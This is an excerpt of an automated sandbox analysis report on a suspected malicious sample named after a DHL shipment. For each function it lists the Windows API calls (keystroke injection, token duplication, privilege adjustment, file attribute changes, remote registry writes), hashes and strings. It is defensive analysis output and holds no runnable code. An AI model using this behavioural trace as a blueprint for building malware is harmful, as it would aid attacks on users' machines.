                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: 117d4443c8501ce4c8c95a31332936277f53f3a231eaf518ec7fad8777a82f8d
                                                                                    • Instruction ID: ebec1ab9910709012097c113025e00889fb1758d1782b4b26dd28cd46af8f950
                                                                                    • Opcode Fuzzy Hash: 117d4443c8501ce4c8c95a31332936277f53f3a231eaf518ec7fad8777a82f8d
                                                                                    • Instruction Fuzzy Hash: 1101D672204701AED3259F78C806FA7BBB49F44760F10852FF61ACA291EA79E840C7A0
                                                                                    Function 007D4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __lock_file.LIBCMT ref: 007D48A6
                                                                                      • Part of subcall function 007D8B28: __getptd_noexit.LIBCMT ref: 007D8B28
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2597487223-0
                                                                                    • Opcode ID: 2bead88ff7598ef3d3cb7af5aec96b2a6a1b9f78a20ce6fe7b513d5f8c7c251e
                                                                                    • Instruction ID: 14b012fd431783a8ea230b180f36a1d3ec81435b5158da09fcda95f42f687717
                                                                                    • Opcode Fuzzy Hash: 2bead88ff7598ef3d3cb7af5aec96b2a6a1b9f78a20ce6fe7b513d5f8c7c251e
                                                                                    • Instruction Fuzzy Hash: 74F0CD71900689EBDF51AFB4CC0A7AE37B1AF00365F158416F424AA3D1CBBC9A51EB52
                                                                                    Function 007B4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,?,008752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4E7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 3664257935-0
                                                                                    • Opcode ID: 724f8a4de8320525788851a235c6f0dae256fda4cf603dc5b790057c6595e265
                                                                                    • Instruction ID: e9883066a63cb332a26b6219fdb6bc2331a2108f806f49518ab1aae8b3333ab9
                                                                                    • Opcode Fuzzy Hash: 724f8a4de8320525788851a235c6f0dae256fda4cf603dc5b790057c6595e265
                                                                                    • Instruction Fuzzy Hash: 07F03971501711DFCB349F64E494996BBF1BF543293208A3EE2D682622C77AE840DF40
                                                                                    Function 007D0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D07B0
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongNamePath_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2514874351-0
                                                                                    • Opcode ID: 7e181acf071c43428eb98ac723585738eef8ed8ff80981e543a7ee0a30313194
                                                                                    • Instruction ID: e61a610462582a240660a9c1afe69cabc4239cd2e4355aa4f95f4c69969c40f1
                                                                                    • Opcode Fuzzy Hash: 7e181acf071c43428eb98ac723585738eef8ed8ff80981e543a7ee0a30313194
                                                                                    • Instruction Fuzzy Hash: B7E0867690512897C72096699C0AFEA779DDFC86A0F0441B5FD08D7245D964AC8086D0
                                                                                    Function 007D525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wfsopen
                                                                                    • String ID:
                                                                                    • API String ID: 197181222-0
                                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                    • Instruction ID: d1b56c594455d06f977ee9e2de8b93d16e587ca14cdb23e5ec5bed9ead0cba8a
                                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                    • Instruction Fuzzy Hash: D3B092B644020CB7CE012A82EC02A493B29AB41764F408021FB0C18262E677A6689A89
                                                                                    Function 0149C8D8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000001F4), ref: 0149C8E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_149a000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction ID: 6e8aa13bd4ef82c46b85ae22dabafe3be87a32b524e0ff92c1068f06b0d9c01d
                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction Fuzzy Hash: A0E0E67494010DDFDB00DFB4D6496AD7FB4EF04301F100161FD01D2280D6309D608A72

                                                                                    Non-executed Functions

                                                                                    Function 0083CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0083CB37
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0083CB95
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0083CBD6
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0083CC00
                                                                                    • SendMessageW.USER32 ref: 0083CC29
                                                                                    • _wcsncpy.LIBCMT ref: 0083CC95
                                                                                    • GetKeyState.USER32(00000011), ref: 0083CCB6
                                                                                    • GetKeyState.USER32(00000009), ref: 0083CCC3
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0083CCD9
                                                                                    • GetKeyState.USER32(00000010), ref: 0083CCE3
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0083CD0C
                                                                                    • SendMessageW.USER32 ref: 0083CD33
                                                                                    • SendMessageW.USER32(?,00001030,?,0083B348), ref: 0083CE37
                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0083CE4D
                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0083CE60
                                                                                    • SetCapture.USER32(?), ref: 0083CE69
                                                                                    • ClientToScreen.USER32(?,?), ref: 0083CECE
                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0083CEDB
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0083CEF5
                                                                                    • ReleaseCapture.USER32 ref: 0083CF00
                                                                                    • GetCursorPos.USER32(?), ref: 0083CF3A
                                                                                    • ScreenToClient.USER32(?,?), ref: 0083CF47
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0083CFA3
                                                                                    • SendMessageW.USER32 ref: 0083CFD1
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0083D00E
                                                                                    • SendMessageW.USER32 ref: 0083D03D
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0083D05E
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0083D06D
                                                                                    • GetCursorPos.USER32(?), ref: 0083D08D
                                                                                    • ScreenToClient.USER32(?,?), ref: 0083D09A
                                                                                    • GetParent.USER32(?), ref: 0083D0BA
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0083D123
                                                                                    • SendMessageW.USER32 ref: 0083D154
                                                                                    • ClientToScreen.USER32(?,?), ref: 0083D1B2
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0083D1E2
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0083D20C
                                                                                    • SendMessageW.USER32 ref: 0083D22F
                                                                                    • ClientToScreen.USER32(?,?), ref: 0083D281
                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0083D2B5
                                                                                      • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0083D351
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                    • String ID: @GUI_DRAGID$F
                                                                                    • API String ID: 3977979337-4164748364
                                                                                    • Opcode ID: ba636faaea24ea0e3029500616bf9a3b7e95bda8962097f827e93cc8e8c387f4
                                                                                    • Instruction ID: 47e9360c235a392135abec53dff978f22d7a6f1b2b3768c5f0fa30cd84d33aad
                                                                                    • Opcode Fuzzy Hash: ba636faaea24ea0e3029500616bf9a3b7e95bda8962097f827e93cc8e8c387f4
                                                                                    • Instruction Fuzzy Hash: 4E42AB74604340AFDB24CF24C849EAABBE5FF88320F140929F699E72B1D771D855DB92
                                                                                    Function 007C6F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$_memset
                                                                                    • String ID: 3c|$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_|
                                                                                    • API String ID: 1357608183-1990865874
                                                                                    • Opcode ID: 5ad2cc3ed70897c34944df139254283fcd3b3decc5d8753c1505f727034d22fc
                                                                                    • Instruction ID: c9be5829b4f99269cb705fc7fb94938a7def2e10c75eb271c2c279f7db1251d4
                                                                                    • Opcode Fuzzy Hash: 5ad2cc3ed70897c34944df139254283fcd3b3decc5d8753c1505f727034d22fc
                                                                                    • Instruction Fuzzy Hash: 96939D71A00219DBDB68CF98C885BADB7B1FF48314F25816EE945EB2C1E7749E81CB40
                                                                                    Function 007B48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 007B48DF
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007ED665
                                                                                    • IsIconic.USER32(?), ref: 007ED66E
                                                                                    • ShowWindow.USER32(?,00000009), ref: 007ED67B
                                                                                    • SetForegroundWindow.USER32(?), ref: 007ED685
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007ED69B
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 007ED6A2
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007ED6AE
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 007ED6BF
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 007ED6C7
                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 007ED6CF
                                                                                    • SetForegroundWindow.USER32(?), ref: 007ED6D2
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ED6E7
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007ED6F2
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ED6FC
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007ED701
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ED70A
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007ED70F
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ED719
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007ED71E
                                                                                    • SetForegroundWindow.USER32(?), ref: 007ED721
                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 007ED748
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 4125248594-2988720461
                                                                                    • Opcode ID: 005846d0b0f2143b41b52f3300fa5d77d80e1a7f8d4f581406b9bd11ae557005
                                                                                    • Instruction ID: dee0ae06dfb635b48d5e666709639d178cfdbea9290f106d57063962926badb0
                                                                                    • Opcode Fuzzy Hash: 005846d0b0f2143b41b52f3300fa5d77d80e1a7f8d4f581406b9bd11ae557005
                                                                                    • Instruction Fuzzy Hash: 1F317571A41358BBEB305B629C4AF7F7E6CFB88B50F104425FB05EA1D1D6B45D00AAE0
                                                                                    Function 00808310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 008087E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0080882B
                                                                                      • Part of subcall function 008087E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00808858
                                                                                      • Part of subcall function 008087E1: GetLastError.KERNEL32 ref: 00808865
                                                                                    • _memset.LIBCMT ref: 00808353
                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008083A5
                                                                                    • CloseHandle.KERNEL32(?), ref: 008083B6
                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008083CD
                                                                                    • GetProcessWindowStation.USER32 ref: 008083E6
                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 008083F0
                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0080840A
                                                                                      • Part of subcall function 008081CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00808309), ref: 008081E0
                                                                                      • Part of subcall function 008081CB: CloseHandle.KERNEL32(?,?,00808309), ref: 008081F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                    • String ID: $default$winsta0
                                                                                    • API String ID: 2063423040-1027155976
                                                                                    • Opcode ID: 966535d2732d32d1c7b2da3e19e97bfcfc1e86265803b2ad0cb491a27735100d
                                                                                    • Instruction ID: cdbbda6f42068c25dbf95eb7927452e27a9ab78e74ce29d74c65fe20da2e7926
                                                                                    • Opcode Fuzzy Hash: 966535d2732d32d1c7b2da3e19e97bfcfc1e86265803b2ad0cb491a27735100d
                                                                                    • Instruction Fuzzy Hash: 25816AB1900209EFDF519FA4CC45AEE7BB9FF04308F144169FA54E62A1EB318E95DB60
                                                                                    Function 0081C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0081C78D
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081C7E1
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0081C806
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0081C81D
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0081C844
                                                                                    • __swprintf.LIBCMT ref: 0081C890
                                                                                    • __swprintf.LIBCMT ref: 0081C8D3
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    • __swprintf.LIBCMT ref: 0081C927
                                                                                      • Part of subcall function 007D3698: __woutput_l.LIBCMT ref: 007D36F1
                                                                                    • __swprintf.LIBCMT ref: 0081C975
                                                                                      • Part of subcall function 007D3698: __flsbuf.LIBCMT ref: 007D3713
                                                                                      • Part of subcall function 007D3698: __flsbuf.LIBCMT ref: 007D372B
                                                                                    • __swprintf.LIBCMT ref: 0081C9C4
                                                                                    • __swprintf.LIBCMT ref: 0081CA13
                                                                                    • __swprintf.LIBCMT ref: 0081CA62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                    • API String ID: 3953360268-2428617273
                                                                                    • Opcode ID: f880bb49c7efea769eef958861bd4781c0515af3d75c81bd1ab92bf6bdf0935a
                                                                                    • Instruction ID: 7b6915c6a55323ec136145757827af5677ebaa7845a85ecac03f3dbd07c2235d
                                                                                    • Opcode Fuzzy Hash: f880bb49c7efea769eef958861bd4781c0515af3d75c81bd1ab92bf6bdf0935a
                                                                                    • Instruction Fuzzy Hash: 60A10DB1508304EBD754EB94C889EEFB7ECFF95704F400929F695C6191EA34EA48CB62
                                                                                    Function 0081EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0081EFB6
                                                                                    • _wcscmp.LIBCMT ref: 0081EFCB
                                                                                    • _wcscmp.LIBCMT ref: 0081EFE2
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0081EFF4
                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0081F00E
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0081F026
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F031
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0081F04D
                                                                                    • _wcscmp.LIBCMT ref: 0081F074
                                                                                    • _wcscmp.LIBCMT ref: 0081F08B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081F09D
                                                                                    • SetCurrentDirectoryW.KERNEL32(00868920), ref: 0081F0BB
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0081F0C5
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F0D2
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F0E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1803514871-438819550
                                                                                    • Opcode ID: 640d79eb393f8b876c10935f84b95b6e39c787b842228780cc72c2e4f1b07a0a
                                                                                    • Instruction ID: 31c0fd0a1fd63248db6d64b08c245cb5069d76f4b38f0fd48237360803169b9a
                                                                                    • Opcode Fuzzy Hash: 640d79eb393f8b876c10935f84b95b6e39c787b842228780cc72c2e4f1b07a0a
                                                                                    • Instruction Fuzzy Hash: F631C432900609AADB149BB4EC59AEE77ACFF48360F100576FA14D21A2DB74DA80CE91
                                                                                    Function 00830857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00830953
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0083F910,00000000,?,00000000,?,?), ref: 008309C1
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00830A09
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00830A92
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00830DB2
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00830DBF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
